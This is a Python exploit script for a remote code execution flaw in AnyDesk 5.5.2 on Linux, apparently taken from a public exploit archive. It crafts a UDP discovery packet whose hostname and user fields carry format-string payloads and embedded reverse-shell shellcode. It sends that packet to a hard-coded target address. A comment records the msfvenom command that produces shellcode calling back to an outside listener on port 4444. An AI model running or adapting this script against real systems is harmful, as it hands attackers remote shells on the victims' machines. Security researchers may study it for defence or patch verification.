anydesk_rce_py3.py

# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
# Date: 09/06/20
# Exploit Author: scryh
# Vendor Homepage: https://anydesk.com/en
# Version: 5.5.2
# Tested on: Linux
# Walkthrough: https://devel0pment.de/?p=1881

#!/usr/bin/env python
import struct
import socket
import sys

ip = '10.0.6.52'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
    d  = bytes([0x3e, 0xd1, 0x1])
    d += struct.pack('>I', ad_id)
    d += struct.pack('>I', 0)
    d += bytes([0x2, os])
    d += struct.pack('>I', len(hn)) + hn.encode('latin1')
    d += struct.pack('>I', len(user)) + user.encode('latin1')
    d += struct.pack('>I', 0)
    d += struct.pack('>I', len(inf)) + inf.encode('latin1')
    d += bytes([0])
    d += struct.pack('>I', len(func)) + func.encode('latin1')
    d += bytes([0x2, 0xc3, 0x51])
    return d

# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
shellcode =  b""
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\xd8\xa2\x16"
shellcode += b"\xad\x3d\x82\xd4\x37\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\xb2\x8b\x4e\x34\x57"
shellcode += b"\x80\x8b\x5d\xd9\xfc\x19\xa8\x75\x15\x9c\x8e"
shellcode += b"\xda\xa2\x07\xf1\x37\x82\xd2\x05\x89\xea\x9f"
shellcode += b"\x4b\x57\x92\x8e\x5d\xf2\xfa\x19\xa8\x57\x81"
shellcode += b"\x8a\x7f\x27\x6c\x7c\x8c\x65\x8d\xd1\x42\x2e"
shellcode += b"\xc8\x2d\xf5\xa4\xca\x6f\x18\xba\xcb\x78\x82"
shellcode += b"\x4e\xea\xd4\x64\x90\x2b\xf1\xff\x6a\xca\x5d"
shellcode += b"\xd1\xd7\xa7\x16\xad\x3d\x82\xd4\x37"

shellcode_str = "".join([chr(b) for b in shellcode])  # Convert bytes to a string

print('sending payload ...')
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln' + shellcode_str, '\x85\xfe%18472249x%93$ln', 'ad', 'main')
print(p)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')